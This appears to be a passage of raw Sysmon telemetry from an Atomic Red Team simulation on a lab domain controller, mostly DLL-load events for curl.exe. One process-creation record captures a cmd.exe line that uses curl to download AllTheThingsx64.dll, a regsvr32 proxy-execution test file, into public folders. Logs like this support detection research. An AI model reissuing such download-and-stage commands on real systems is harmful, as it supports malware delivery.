16:32:42.257{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000034354129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.255{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000034354128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.254{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000034354127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.253{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000034354126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.253{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000034354125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.253{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000034354124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.252{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000034354123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.252{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000034354122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.252{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000034354121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.251{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000034354120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.251{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000034354119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.251{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000034354118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.250{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000034354117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.250{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000034354116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.250{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000034354115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.249{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000034354114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.248{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000034354113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.248{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000034354112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.247{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000034354111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.247{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000034354110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.247{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000034354109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.246{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000034354108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.246{8B6011A9-F329-616E-043B-01000000F101}29362664C:\Windows\system32\cmd.exe{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000034354107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.246{8B6011A9-F32A-616E-063B-01000000F101}5456C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-F329-616E-043B-01000000F101}2936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll" 534500x800000000000000034354106Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.243{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exe 11241100x800000000000000034354105Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.238{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Users\Public\Music\allthethingsx64.dll2021-10-19 16:32:42.237 734700x800000000000000034354104Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.050{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000034354103Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.049{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000034354102Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.048{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000034354101Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.047{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000034354098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.033{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000034354097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.032{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000034354096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.029{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354095Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.029{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.029{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.029{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354092Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.029{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000034354091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.028{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.028{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.028{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.028{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000034354087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.026{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000034354086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.024{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000034354085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.023{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000034354084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.022{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000034354083Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.022{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000034354082Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.019{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000034354081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.017{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000034354080Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.017{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000034354079Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.015{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000034354078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.015{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000034354077Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.015{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000034354076Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.014{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000034354075Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.013{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000034354074Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.012{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000034354073Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.010{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft 